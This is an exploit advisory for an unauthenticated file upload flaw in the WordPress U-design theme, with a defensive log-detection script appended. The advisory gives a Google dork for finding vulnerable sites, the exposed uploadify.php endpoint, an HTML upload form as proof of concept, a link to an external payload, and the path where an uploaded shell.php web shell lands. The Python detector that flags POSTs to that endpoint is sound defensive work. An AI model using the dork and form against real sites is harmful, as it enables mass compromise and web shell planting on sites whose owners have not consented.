WordPress Themes U-design File Upload


Exploit Title : WordPress Themes U-design File Upload
Author : Mohammad peywasteh
Tested : Win10
-------------------------------------------

Google Dork : inurl:/wp-content/themes/[u/design OR u-design ]

Exploit : https://localhost/wp-content/themes/[u/design OR u-design ]/scripts/admin/uploadify/uploadify.php

Vulnerability : Exploit Page 

PoC :

<form method="POST" action="https://localhost/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

Click >> https://ghostbin.com/paste/ov2md

File Access : https://localhost/patch/shell.php
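
Detection example (added here, not part of the original advisory): a log check that flags POST requests to the uploadify.php endpoint named above, under either theme directory spelling. It assumes access logs in common/combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Both directory spellings from the advisory ("u-design" and "u/design").
# Case-insensitive: the advisory was tested on Windows, where paths ignore case.
ENDPOINT_RE = re.compile(
    r'^/wp-content/themes/u[-/]design/scripts/admin/uploadify/uploadify\.php$',
    re.IGNORECASE,
)

def normalize_path(target):
    """Drop the query string, decode %XX escapes, collapse repeated slashes."""
    path = unquote(target.split('?', 1)[0])
    return re.sub(r'/{2,}', '/', path)

def find_upload_hits(lines):
    """Return POSTs to the uploadify endpoint; 'served' is True on a 2xx reply."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m['method'] != 'POST':
            continue
        if ENDPOINT_RE.match(normalize_path(m['target'])):
            status = int(m['status'])
            hits.append({'ip': m['ip'], 'time': m['ts'], 'status': status,
                         'served': 200 <= status < 300})
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "POST /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 12 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Oct/2023:14:02:11 +0000] "POST //wp-content/themes/u/design/scripts/admin/uploadify/Uploadify.php?x=1 HTTP/1.1" 404 153 "-" "-"',
    '203.0.113.9 - - [10/Oct/2023:14:02:15 +0000] "POST /wp-content/themes/u%2Ddesign/scripts/admin/uploadify/uploadify.php HTTP/1.1" 403 199 "-" "-"',
    '192.0.2.44 - - [10/Oct/2023:14:10:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in find_upload_hits(SAMPLE_LOG):
        print(hit)
```

A hit with served=True means the script is present and answered the POST, so the theme's upload directory should be reviewed for unexpected files; 403/404 hits show probing against an endpoint that is blocked or absent.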